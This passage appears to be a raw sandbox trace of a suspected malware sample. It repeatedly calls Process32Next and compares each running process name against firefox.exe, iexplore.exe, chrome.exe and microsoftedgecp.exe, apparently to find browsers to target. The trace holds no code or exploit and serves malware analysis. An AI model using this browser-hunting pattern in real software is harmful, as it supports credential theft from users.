th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.529] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0232.529] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0232.529] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0232.529] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0232.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.529] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0232.529] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0232.529] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0232.529] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0232.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.530] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0232.530] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0232.530] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0232.530] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.530] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.530] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0232.530] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0232.530] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0232.530] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.530] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.531] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0232.531] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0232.531] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0232.531] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.531] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.531] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0232.532] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0232.532] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0232.532] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.532] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0232.532] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0232.532] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0232.532] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.533] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0232.533] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0232.533] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0232.533] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.533] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0232.533] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0232.533] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0232.533] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0232.534] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0232.534] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0232.534] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0232.534] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.534] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.534] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.534] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.534] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.534] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.534] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.535] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.535] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.536] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.536] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.536] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.537] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.537] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.537] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.537] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.537] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.537] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0232.537] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0232.537] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0232.537] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.537] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.538] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.538] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.538] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.539] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0232.539] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0232.539] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0232.539] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.539] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.539] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0232.539] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0232.539] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0232.539] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.539] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0232.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0232.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0232.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0232.540] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.540] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.540] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0232.541] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0232.541] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0232.541] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.541] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0232.541] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0232.541] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0232.541] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0232.541] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.541] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0232.542] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0232.542] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0232.542] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0232.542] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.542] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0232.542] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0232.542] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0232.542] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0232.542] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.542] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0232.543] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0232.543] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0232.543] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0232.543] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.543] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0232.543] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0232.543] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0232.543] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0232.543] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.543] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0232.544] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0232.544] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0232.544] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0232.544] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.544] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0232.544] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0232.544] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0232.544] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0232.544] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.544] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0232.545] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0232.545] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0232.545] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0232.545] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.545] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0232.546] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0232.546] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0232.546] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0232.546] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.546] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0232.546] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0232.546] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0232.546] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0232.546] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.546] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0232.547] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0232.547] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0232.547] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0232.547] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.547] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0232.547] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0232.547] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0232.547] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0232.547] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.547] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0232.548] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0232.548] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0232.548] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0232.548] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.548] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0232.548] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0232.548] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0232.548] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0232.548] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.548] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0232.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0232.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0232.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0232.549] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.549] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0232.549] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0232.549] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0232.549] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0232.550] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0232.550] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0232.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0232.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0232.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0232.550] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.550] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0232.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0232.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0232.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0232.551] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.551] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0232.551] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0232.551] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0232.551] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0232.551] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0232.551] Process32Next (in: hSnapshot=0xd4, 